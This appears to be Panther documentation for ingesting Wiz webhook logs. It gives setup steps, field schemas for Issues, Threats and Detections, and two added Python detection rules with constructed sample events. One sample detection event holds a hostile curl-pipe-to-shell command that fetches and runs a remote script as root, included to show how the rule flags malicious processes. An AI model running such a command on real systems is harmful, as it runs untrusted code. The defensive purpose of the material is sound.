Wiz Webhook (Beta)
Panther supports receiving logs from Wiz webhooks
Overview
Panther can receive real-time webhook notifications from Wiz containing Issues, Threats, and Detections events. This integration provides immediate visibility into security findings across your cloud infrastructure, enabling fast incident response.
How to onboard Wiz webhook logs to Panther
Prerequisites
To set up this integration, you must have access to a Wiz tenant and permission to create a webhook.
To receive Threats and Detections events, you must have a subscription to Wiz Defend.
Step 1: Create a new Wiz webhook log source in Panther
In the left-hand navigation bar of your Panther Console, click Configure > Log Sources.
Click Create New.
Search for "Wiz Webhook," then click its tile.
In the upper-right corner of the slide-out panel, click Start Setup.

Follow Panther's instructions for configuring an HTTP Source, beginning at Step 5.
Payloads sent to this source are subject to the payload requirements for all HTTP sources.
Do not proceed to the next step until the creation of your HTTP endpoint has completed.
Step 2: Configure webhook notifications in Wiz
In your Wiz console, navigate to Settings > Integrations.
Click Add Integration.
Under SIEM & Automation Tools, click Webhook.
On the New Integration page, fill in the fields:
Name: provide a descriptive name for the webhook, e.g., Panther Integration.
Project Scope: select the scopes you'd like to include.
URL: enter the HTTP Source URL you generated in Panther.
Authentication: select the type of authentication you used in Panther in Step 1, and provide the associated credentials.
Click Add Integration.
Panther-managed detections
See Panther-managed rules for Wiz in the panther-analysis GitHub repository.
Supported log types
Wiz.IssuesWebhook
The Issues log records key events in Wiz related to issues, such as vulnerability findings and security incidents. It is used to track, manage, and remediate security vulnerabilities and incidents.
schema: Wiz.IssuesWebhook
description: The Issues Log records key events in Wiz related to issues, such as vulnerability findings and security incidents. It is used to track, manage, and remediate security vulnerabilities and incidents.
referenceURL: https://win.wiz.io/docs/issues-webhook
fields:
- name: trigger
required: true
type: object
description: Contains information about what triggered the webhook event
fields:
- name: source
type: string
description: Source of the trigger
- name: type
type: string
description: Type of trigger event
- name: ruleId
type: string
description: ID of the automation rule
- name: ruleName
type: string
description: Name of the automation rule
- name: updatedFields
type: string
description: List of updated fields
- name: changedBy
type: string
description: User that initiated the change
indicators:
- username
- name: triggeredBy
type: string
description: The user or Automation Rule that ran an Action
- name: issue
required: true
type: object
description: Contains information about the issue that was triggered
fields:
- name: id
type: string
description: Unique identifier of the Issue
- name: status
type: string
description: Current status of the Issue
- name: severity
type: string
description: Severity level of the Issue
- name: created
type: timestamp
timeFormats:
- rfc3339
description: Creation timestamp
isEventTime: true
- name: projects
type: string
description: Projects associated with the issue
- name: evidence
type: json
description: Evidence details (see note below)
- name: link
type: string
indicators:
- url
description: Direct link to the issue in Wiz
- name: resource
required: true
type: object
description: Represents the affected cloud resource
fields:
- name: id
type: string
description: Cloud provider's resource ID
- name: name
type: string
description: Resource name
- name: type
type: string
description: Native resource type
- name: resourceType
type: string
description: Resource type
- name: cloudPlatform
type: string
description: Cloud platform identifier
- name: subscriptionId
type: string
description: Subscription ID
- name: subscriptionName
type: string
description: Subscription name
- name: subscriptionTags
type: json
description: Tags associated with the subscription
- name: region
type: string
description: Resource region
- name: status
type: string
description: Resource status
- name: cloudProviderURL
type: string
indicators:
- url
description: URL to resource in cloud console
- name: resourceGroupId
type: string
description: Resource group ID
- name: tags
type: json
description: Tags associated with the resource
- name: externalId
type: string
description: External identifier
- name: created
type: timestamp
timeFormats:
- rfc3339
description: Creation time of primary resource
- name: kubernetesClusterId
type: string
description: K8s cluster ID
- name: kubernetesClusterName
type: string
description: K8s cluster name
- name: kubernetesNamespaceName
type: string
description: K8s namespace name
- name: containerServiceId
type: string
description: Container service ID
- name: containerServiceName
type: string
description: Container service name
- name: originalJson
type: json
description: Original JSON from cloud provider
- name: control
required: true
type: object
description: Represents the Control that generated the Issue
fields:
- name: id
type: string
description: Control identifier
- name: name
type: string
description: Control name
- name: description
type: string
description: Control description
- name: severity
type: string
description: Control severity level
- name: risks
type: json
description: Associated risks
- name: resolutionRecommendation
type: string
description: Resolution recommendation
- name: resolutionRecommendationPlainText
type: string
description: Plain text resolution recommendation
- name: sourceCloudConfigurationRuleId
type: string
description: Source cloud configuration rule ID
- name: sourceCloudConfigurationRuleName
type: string
description: Source cloud configuration rule name
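Worked example, added here and not one of Panther's managed Wiz rules: a Panther-style Python rule written against the Wiz.IssuesWebhook fields documented above. It alerts only on Issues that are still active and rated High or Critical, carries the Wiz severity into the alert, deduplicates on issue.id so repeated webhook deliveries for one Issue do not page twice, and packs the responder's pivot links into alert_context. The status and severity string values (OPEN, IN_PROGRESS, CRITICAL, ...), the sample payload, and the local deep_get stand-in for Panther's event.deep_get() are assumptions.

```python
"""Panther-style rule for Wiz.IssuesWebhook events (added example, not a managed rule).

Field paths follow the Wiz.IssuesWebhook schema. The status/severity values,
the sample payload and the deep_get stand-in are assumptions.
"""
from typing import Any

ALERT_SEVERITIES = {"CRITICAL", "HIGH"}            # page on these only
ACTIVE_STATUSES = {"OPEN", "IN_PROGRESS"}           # assumed Wiz issue states
PANTHER_SEVERITIES = {"CRITICAL", "HIGH", "MEDIUM", "LOW", "INFO"}


def deep_get(obj: Any, *keys: str, default: Any = None) -> Any:
    """Local stand-in for Panther's event.deep_get(): walk nested dicts safely."""
    for key in keys:
        if not isinstance(obj, dict):
            return default
        obj = obj.get(key)
    return default if obj is None else obj


def rule(event: dict) -> bool:
    """Alert only on Issues that are still active and High/Critical."""
    status = str(deep_get(event, "issue", "status", default="")).upper()
    sev = str(deep_get(event, "issue", "severity", default="")).upper()
    return status in ACTIVE_STATUSES and sev in ALERT_SEVERITIES


def severity(event: dict) -> str:
    """Carry Wiz's severity into the alert; DEFAULT keeps the rule's YAML severity."""
    sev = str(deep_get(event, "issue", "severity", default="")).upper()
    return sev if sev in PANTHER_SEVERITIES else "DEFAULT"


def dedup(event: dict) -> str:
    """One alert per Wiz Issue, however many webhook deliveries it produces."""
    return str(deep_get(event, "issue", "id", default="unknown-issue"))


def title(event: dict) -> str:
    sev = deep_get(event, "issue", "severity", default="UNKNOWN")
    control = deep_get(event, "control", "name", default="unknown control")
    platform = deep_get(event, "resource", "cloudPlatform", default="unknown platform")
    resource = deep_get(event, "resource", "name", default="unknown resource")
    return f"Wiz {sev} issue: {control} on {platform} resource {resource}"


def alert_context(event: dict) -> dict:
    """Pivot data for the responder: Wiz link, cloud console link, scope, remediation."""
    return {
        "issue_id": deep_get(event, "issue", "id"),
        "issue_link": deep_get(event, "issue", "link"),
        "resource_id": deep_get(event, "resource", "id"),
        "cloud_console_url": deep_get(event, "resource", "cloudProviderURL"),
        "subscription": deep_get(event, "resource", "subscriptionName"),
        "kubernetes_cluster": deep_get(event, "resource", "kubernetesClusterName"),
        "kubernetes_namespace": deep_get(event, "resource", "kubernetesNamespaceName"),
        "trigger_type": deep_get(event, "trigger", "type"),
        "automation_rule": deep_get(event, "trigger", "ruleName"),
        "remediation": deep_get(event, "control", "resolutionRecommendationPlainText"),
    }


# Constructed sample payload shaped like the schema above; not a real Wiz event.
SAMPLE_OPEN_CRITICAL = {
    "trigger": {"source": "ISSUES", "type": "CREATED",
                "ruleId": "rule-123", "ruleName": "Forward critical issues to Panther"},
    "issue": {
        "id": "2a3e0b7e-1b1a-4d0a-9f1c-0d7d8e5f1a2b",
        "status": "OPEN",
        "severity": "CRITICAL",
        "created": "2024-05-01T12:00:00Z",
        "projects": "prod",
        "link": "https://app.wiz.io/issues/2a3e0b7e-1b1a-4d0a-9f1c-0d7d8e5f1a2b",
    },
    "resource": {
        "id": "arn:aws:s3:::acme-prod-backups",
        "name": "acme-prod-backups",
        "type": "bucket",
        "cloudPlatform": "AWS",
        "subscriptionName": "acme-prod",
        "region": "us-east-1",
        "cloudProviderURL": "https://s3.console.aws.amazon.com/s3/buckets/acme-prod-backups",
    },
    "control": {
        "id": "ctrl-0001",
        "name": "Publicly exposed S3 bucket with sensitive data",
        "severity": "CRITICAL",
        "resolutionRecommendationPlainText": "Enable S3 Block Public Access on the bucket.",
    },
}
# The same Issue after it was closed: an update webhook that must not re-alert.
SAMPLE_RESOLVED = {**SAMPLE_OPEN_CRITICAL,
                   "trigger": {"source": "ISSUES", "type": "UPDATED", "updatedFields": "status"},
                   "issue": {**SAMPLE_OPEN_CRITICAL["issue"], "status": "RESOLVED"}}
```

In a deployed rule the event argument is Panther's event object rather than a plain dict, and deep_get would be replaced by event.deep_get(); the function names and return types (rule, title, severity, dedup, alert_context) follow Panther's Python rule contract. Because every webhook delivery for an Issue, including status changes, arrives as its own event, the dedup key on issue.id is what keeps a single finding from producing a new alert on each update.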
Wiz.Threats
The Threats log records webhook notifications for threat detection events. This helps track active threats, malicious activities, and security incidents across your cloud infrastructure.
schema: Wiz.Threats
description: The Threats Log records webhook notifications for Wiz threat detection events, covering active threats and malicious activity across your cloud infrastructure. It is used to track, triage, and respond to threats.
referenceURL: https://win.wiz.io/docs/threats-webhook
fields:
- name: trigger
required: true
type: object
description: Contains information about the event that triggered the webhook
fields:
- name: source
type: string
description: The source of the trigger. For this webhook, the value is always THREATS
- name: type
type: string
description: The type of trigger, e.g., Manually Triggered or Rule Triggered
- name: ruleId
type: string
description: If triggered by a rule, the unique identifier of that rule
- name: ruleName
type: string
description: The name of the trigger, e.g., Manual or the name of the automation rule
- name: updatedFields
type: string
description: A description of fields that were changed, triggering the webhook
- name: changedBy
type: string
description: The user or system that initiated the change
- name: threat
required: true
type: object
description: The main object containing all the details of the exported Threat
fields:
- name: id
type: string
description: Unique identifier for the Threat
- name: title
type: string
description: The title of the Threat
- name: description
type: string
description: A detailed description of the Threat
- name: status
type: string
description: The current status of the Threat (e.g., IN_PROGRESS, RESOLVED)
- name: severity
type: string
description: The severity level of the Threat (e.g., CRITICAL, HIGH)
- name: created
type: timestamp
timeFormats:
- rfc3339
isEventTime: true
description: ISO 8601 timestamp for when the Threat was created
- name: resolutionNote
type: string
description: The note added when the Threat was resolved
- name: projects
type: string
description: A comma-separated list of projects associated with the Threat
- name: threatURL
type: string
indicators:
- url
description: A direct URL to the Threat in the UI
- name: resolvedAt
type: timestamp
timeFormats:
- rfc3339
description: ISO 8601 timestamp for when the Threat was resolved
- name: updatedAt
type: timestamp
timeFormats:
- rfc3339
description: ISO 8601 timestamp for the last time the Threat was updated
- name: cloudPlatform
type: string
description: The cloud platform where the Threat was detected (e.g., Azure, AWS)
- name: cloudAccounts
type: array
description: List of associated cloud accounts
element:
type: object
fields:
- name: id
type: string
description: The unique identifier for the cloud account
- name: name
type: string
description: The name of the cloud account
- name: cloudOrganizations
type: array
description: List of associated cloud organizations
element:
type: object
fields:
- name: id
type: string
description: The unique identifier for the cloud organization
- name: name
type: string
description: The name of the cloud organization
- name: actors
type: array
description: List of actors involved in the Threat
element:
type: object
fields:
- name: externalId
type: string
description: The ID of the actor as defined in the cloud provider
- name: id
type: string
description: The internal unique identifier for the actor
indicators:
- actor_id
- name: name
type: string
description: The name of the actor
- name: nativeType
type: string
description: The specific type of the actor from the cloud provider's perspective
- name: type
type: string
description: The general type of the actor (e.g., Service Account)
- name: resources
type: array
description: List of resources involved in the Threat
element:
type: object
fields:
- name: name
type: string
description: The name of the resource
- name: externalId
type: string
description: The full resource identifier from the cloud provider
- name: id
type: string
description: The internal unique identifier for the resource
- name: nativeType
type: string
description: The specific type of the resource from the cloud provider's perspective
- name: type
type: string
description: The general type of the resource (e.g., Virtual Machine)
- name: tdrNames
type: string
description: A comma-separated list of the names of the underlying detection rules
- name: detectionIds
type: string
description: A comma-separated list of the IDs of the underlying detections
- name: mitreTechniques
type: array
description: A list of MITRE ATT&CK technique IDs
element:
type: string
indicators:
- mitre_attack_technique
- name: mitreTactics
type: array
description: A list of MITRE ATT&CK tactic IDs
element:
type: string
indicators:
- mitre_attack_technique
- name: notes
type: string
description: A comma-separated list of notes added to the Threat
Wiz.Detections
The Detections log captures webhook notifications for security detection findings. This includes alerts from security rules, anomaly detection, and behavioral analysis.
schema: Wiz.Detections
description: The Detections Log records webhook notifications for Wiz detection findings, including alerts from security rules, anomaly detection, and behavioral analysis. It is used to investigate and respond to suspicious activity.
referenceURL: https://win.wiz.io/docs/detections-webhook
fields:
- name: trigger
required: true
type: object
description: Details on the trigger including source, type, ruleId, and ruleName
fields:
- name: source
type: string
description: Source of the trigger
- name: type
type: string
description: Type of trigger event
- name: ruleId
type: string
description: ID of the automation rule
- name: ruleName
type: string
description: Name of the automation rule
- name: id
required: true
type: string
description: Unique identifier for the detection
- name: threatId
required: true
type: string
description: ID of the associated threat
- name: threatURL
required: true
type: string
indicators:
- url
description: URL linking to more details on the threat
- name: title
type: string
description: Title or summary of the detection
- name: description
type: string
description: Description providing more details on the detection
- name: severity
type: string
description: Severity level of the detection
- name: createdAt
type: timestamp
timeFormats:
- rfc3339
isEventTime: true
description: ISO8601 timestamp for when detection was created
- name: tdrId
type: string
description: TDR identifier
- name: tdrSource
type: string
description: TDR source
- name: mitreTactics
type: array
element:
type: string
description: MITRE tactic related to detection
- name: mitreTechniques
type: array
element:
type: string
description: MITRE technique related to detection
- name: cloudAccounts
type: array
description: List of associated cloud accounts
element:
type: object
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: cloudOrganizations
type: array
description: List of associated cloud organizations
element:
type: object
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud organization
- name: id
type: string
description: ID of the cloud organization
- name: name
type: string
description: Name of the cloud organization
- name: timeframe
type: object
description: Object containing start and end timestamps for the detection timeframe
fields:
- name: start
type: timestamp
timeFormats:
- rfc3339
description: Start timestamp of the detection timeframe
- name: end
type: timestamp
timeFormats:
- rfc3339
description: End timestamp of the detection timeframe
- name: actors
type: array
description: List of actor details
element:
type: object
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: actingAs
type: object
description: Actor acting as
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: email
type: string
description: Email of the actor
- name: primaryActor
type: object
description: Primary actor associated with the detection
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
indicators:
- actor_id
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: actingAs
type: object
description: Actor acting as
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: email
type: string
description: Email of the actor
- name: resources
type: array
description: List of resource details
element:
type: object
fields:
- name: cloudAccount
type: object
description: Associated cloud account information
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Resource ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the resource
- name: nativeType
type: string
description: Native type classification
- name: region
type: string
description: Geographic region
- name: status
type: string
description: Current status of the resource
- name: type
type: string
description: Type of resource
- name: kubernetesNodeId
type: string
description: Kubernetes node ID
- name: kubernetesNodeName
type: string
description: Kubernetes node name
- name: kubernetesNamespaceId
type: string
description: Kubernetes namespace ID
- name: kubernetesNamespaceName
type: string
description: Kubernetes namespace name
- name: kubernetesClusterId
type: string
description: ID of the Kubernetes cluster
- name: kubernetesClusterName
type: string
description: Name of the Kubernetes cluster
- name: cloudProviderUrl
type: string
description: URL to resource in cloud provider console.
indicators:
- url
- name: primaryResource
type: object
description: Primary resource associated with the detection
fields:
- name: cloudAccount
type: object
description: Associated cloud account information
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Resource ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the resource
- name: nativeType
type: string
description: Native type classification
- name: region
type: string
description: Geographic region
- name: status
type: string
description: Current status of the resource
- name: type
type: string
description: Type of resource
- name: kubernetesNodeId
type: string
description: Kubernetes node ID
- name: kubernetesNodeName
type: string
description: Kubernetes node name
- name: kubernetesNamespaceId
type: string
description: Kubernetes namespace ID
- name: kubernetesNamespaceName
type: string
description: Kubernetes namespace name
- name: kubernetesClusterId
type: string
description: ID of the Kubernetes cluster
- name: kubernetesClusterName
type: string
description: Name of the Kubernetes cluster
- name: cloudProviderUrl
type: string
description: URL to resource in cloud provider console.
indicators:
- url
- name: triggeringEventsCount
type: bigint
description: Count of events that triggered detection
- name: triggeringEvents
type: array
description: List of event details
element:
type: object
fields:
- name: actor
type: object
description: Actor associated with event
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
indicators:
- actor_id
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: actingAs
type: object
description: Actor acting as
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: email
type: string
description: Email of the actor
indicators:
- email
- name: actorIP
type: string
indicators:
- ip
description: IP address of the actor
- name: actorIPMeta
type: object
description: Metadata object containing IP information
fields:
- name: autonomousSystemNumber
type: bigint
description: ASN number
- name: autonomousSystemOrganization
type: string
description: Organization associated with ASN (ASO)
- name: country
type: string
description: Country of origin for IP
- name: isForeign
type: boolean
description: Whether IP is from foreign source
- name: reputation
type: string
description: IP reputation rating
- name: reputationSource
type: string
description: Source of reputation data
- name: reputationDescription
type: string
description: Description of IP reputation
- name: relatedAttackGroupNames
type: json
description: Attack groups associated with IP
- name: customIPRanges
type: json
description: Object containing custom IP range definitions
- name: category
type: string
description: Event category
- name: cloudPlatform
type: string
description: Cloud platform where event occurred
- name: cloudProviderUrl
type: string
indicators:
- url
description: URL to event in cloud provider console
- name: description
type: string
description: Description of the event
- name: eventTime
type: timestamp
timeFormats:
- rfc3339
description: ISO8601 timestamp of when event occurred
- name: externalId
type: string
description: External ID of the event
- name: id
type: string
description: Event ID
- name: name
type: string
description: Name of the event
- name: origin
type: string
description: Origin of the event
- name: resources
type: array
description: Resource objects affected by event
element:
type: object
fields:
- name: cloudAccount
type: object
description: Associated cloud account information
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Resource ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the resource
- name: nativeType
type: string
description: Native type classification
- name: region
type: string
description: Geographic region
- name: status
type: string
description: Current status of the resource
- name: type
type: string
description: Type of resource
- name: kubernetesNodeId
type: string
description: Kubernetes node ID
- name: kubernetesNodeName
type: string
description: Kubernetes node name
- name: kubernetesNamespaceId
type: string
description: Kubernetes namespace ID
- name: kubernetesNamespaceName
type: string
description: Kubernetes namespace name
- name: kubernetesClusterId
type: string
description: ID of the Kubernetes cluster
- name: kubernetesClusterName
type: string
description: Name of the Kubernetes cluster
- name: cloudProviderUrl
type: string
description: URL to resource in cloud provider console.
indicators:
- url
- name: runtimeDetails
type: object
description: Runtime details of the event
fields:
- name: processTree
type: array
description: Process tree leading to event
element:
type: object
fields:
- name: command
type: string
description: Process command line
- name: container
type: object
description: Container metadata including id, name, and image details
fields:
- name: externalId
type: string
description: Container external ID
- name: id
type: string
description: Container ID
- name: imageExternalId
type: string
description: Image external ID
- name: imageId
type: string
description: Image ID
- name: name
type: string
description: Container name
- name: executionTime
type: timestamp
timeFormats:
- rfc3339
description: ISO8601 timestamp when process executed
- name: hash
type: string
indicators:
- sha1
description: Executable SHA1 hash
- name: id
type: string
description: Process ID
- name: path
type: string
description: Executable path
- name: size
type: bigint
description: Executable size in bytes
- name: userId
type: string
description: User ID that executed process
- name: username
type: string
description: Username that executed process
indicators:
- username
- name: source
type: string
description: Source of the event
- name: subjectResourceId
type: string
description: ID of the primary affected resource
- name: subjectResourceIp
type: string
description: IP of the primary affected resource
indicators:
- ip
- name: status
type: string
description: Status of the event
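Worked example, added here and not one of Panther's managed Wiz rules: a Panther-style Python rule for Wiz.Detections that walks the nested triggeringEvents array documented above. It collects actor IPs whose actorIPMeta.reputation is bad, flattens every runtimeDetails.processTree into command lines and executable SHA1s for alert_context, escalates the alert severity when a bad-reputation IP is involved, and groups alerts by threatId so one Threat with many detections pages once. The reputation label MALICIOUS, the alerting policy, the sample payload and the local deep_get stand-in for Panther's event.deep_get() are assumptions.

```python
"""Panther-style rule for Wiz.Detections walking triggeringEvents (added example, not a managed rule).

Field paths follow the Wiz.Detections schema. The MALICIOUS reputation label,
the sample payload and the deep_get stand-in are assumptions.
"""
from typing import Any

HIGH_SEVERITIES = {"CRITICAL", "HIGH"}
BAD_REPUTATIONS = {"MALICIOUS"}  # assumed Wiz label; align with what your tenant emits
PANTHER_SEVERITIES = {"CRITICAL", "HIGH", "MEDIUM", "LOW", "INFO"}


def deep_get(obj: Any, *keys: str, default: Any = None) -> Any:
    """Local stand-in for Panther's event.deep_get(): walk nested dicts safely."""
    for key in keys:
        if not isinstance(obj, dict):
            return default
        obj = obj.get(key)
    return default if obj is None else obj


def triggering_events(event: dict) -> list:
    events = event.get("triggeringEvents")
    return [e for e in events if isinstance(e, dict)] if isinstance(events, list) else []


def malicious_ips(event: dict) -> list:
    """Actor IPs whose actorIPMeta.reputation is in BAD_REPUTATIONS, deduplicated and sorted."""
    ips = set()
    for ev in triggering_events(event):
        rep = str(deep_get(ev, "actorIPMeta", "reputation", default="")).upper()
        if ev.get("actorIP") and rep in BAD_REPUTATIONS:
            ips.add(ev["actorIP"])
    return sorted(ips)


def processes(event: dict) -> list:
    """Flatten every runtimeDetails.processTree entry across all triggering events."""
    procs = []
    for ev in triggering_events(event):
        tree = deep_get(ev, "runtimeDetails", "processTree", default=[])
        procs.extend(p for p in (tree if isinstance(tree, list) else []) if isinstance(p, dict))
    return procs


def process_commands(event: dict) -> list:
    return [p["command"] for p in processes(event) if p.get("command")]


def executable_hashes(event: dict) -> list:
    return sorted({p["hash"] for p in processes(event) if p.get("hash")})


def rule(event: dict) -> bool:
    """Fire on High/Critical detections, or on any detection driven by a bad-reputation IP."""
    sev = str(event.get("severity", "")).upper()
    return sev in HIGH_SEVERITIES or bool(malicious_ips(event))


def severity(event: dict) -> str:
    """Escalate to CRITICAL when IP intel is bad; otherwise keep Wiz's own severity."""
    if malicious_ips(event):
        return "CRITICAL"
    sev = str(event.get("severity", "")).upper()
    return sev if sev in PANTHER_SEVERITIES else "DEFAULT"


def dedup(event: dict) -> str:
    """Group by the parent Threat so one incident does not page once per detection."""
    return str(event.get("threatId") or event.get("id") or "wiz-detection")


def title(event: dict) -> str:
    actor = deep_get(event, "primaryActor", "name", default="unknown actor")
    resource = deep_get(event, "primaryResource", "name", default="unknown resource")
    return f"Wiz detection: {event.get('title', 'untitled')} by {actor} on {resource}"


def alert_context(event: dict) -> dict:
    return {
        "detection_id": event.get("id"),
        "threat_url": event.get("threatURL"),
        "mitre_techniques": event.get("mitreTechniques") or [],
        "malicious_ips": malicious_ips(event),
        "process_commands": process_commands(event),
        "executable_sha1s": executable_hashes(event),
        "acting_as": deep_get(event, "primaryActor", "actingAs", "name"),
    }


# Constructed sample: a MEDIUM detection that a bad-reputation IP escalates; not a real Wiz event.
SAMPLE_DETECTION = {
    "trigger": {"source": "DETECTIONS", "type": "CREATED"},
    "id": "det-7f2c", "threatId": "thr-19ab", "threatURL": "https://app.wiz.io/threats/thr-19ab",
    "title": "Suspicious download-and-execute in container", "severity": "MEDIUM",
    "createdAt": "2024-05-01T12:00:00Z", "mitreTechniques": ["T1059.004"],
    "primaryActor": {"id": "act-1", "name": "web-sa", "type": "Service Account",
                     "actingAs": {"id": "act-2", "name": "cluster-admin"}},
    "primaryResource": {"id": "res-1", "name": "web-7c9d", "type": "Pod"},
    "triggeringEvents": [{
        "id": "ev-1", "actorIP": "203.0.113.7",
        "actorIPMeta": {"reputation": "MALICIOUS", "country": "XX", "isForeign": True},
        "runtimeDetails": {"processTree": [
            {"id": "4242", "command": "/bin/sh -c 'curl -s http://203.0.113.7/x.sh | sh'",
             "path": "/bin/sh", "hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "username": "root"},
            {"id": "4243", "command": "curl -s http://203.0.113.7/x.sh",
             "path": "/usr/bin/curl", "hash": "0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33", "username": "root"},
        ]},
    }],
}
# Same detection from an IP with no bad reputation: MEDIUM alone does not alert.
SAMPLE_BENIGN_IP = {**SAMPLE_DETECTION, "triggeringEvents": [
    {**SAMPLE_DETECTION["triggeringEvents"][0], "actorIPMeta": {"reputation": "NONE"}}]}
```

The helpers tolerate missing or malformed nesting (a detection with no triggeringEvents, a process tree that is not a list) because every webhook field below the required ones is optional in the schema; a rule that indexes into them directly will raise and be skipped by the rules engine instead of producing an alert.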